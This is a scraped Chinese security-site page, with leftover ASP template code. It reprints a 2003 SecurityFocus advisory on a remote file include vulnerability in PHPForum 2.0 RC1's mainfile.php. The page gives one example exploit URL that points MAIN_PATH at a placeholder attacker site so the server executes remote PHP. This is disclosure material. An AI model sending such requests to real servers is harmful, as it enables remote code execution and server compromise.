<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("vulnerability,permit") PageTitle=stripHTML("PHPForum 2.0 RC1 Mainfile.PHP Remote File Include Vulnerability") ArticleIntro=stripHTML("77169.com小编引言:PHPForum 2.0 RC1 Mainfile.PHP Remote File Include Vulnerability,漏洞的主要原因:") Articlecontent=stripHTML("source: http://www.securityfocus.com/bid/8158/info

phpForum is prone to a vulne…") ModuleName = stripHTML("exploits") InfoID = stripHTML("170716") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> PHPForum 2.0 RC1 Mainfile.PHP Remote File Include Vulnerability - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> 其它漏洞 >> 正文

PHPForum 2.0 RC1 Mainfile.PHP Remote File Include Vulnerability

2003/7/8 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>
source: http://www.securityfocus.com/bid/8158/info

phpForum is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. This could be exploited to execute malicious PHP commands in the context of the web server process.

http://www.example.com/forum/mainfile.php?MAIN_PATH=[attacker's site]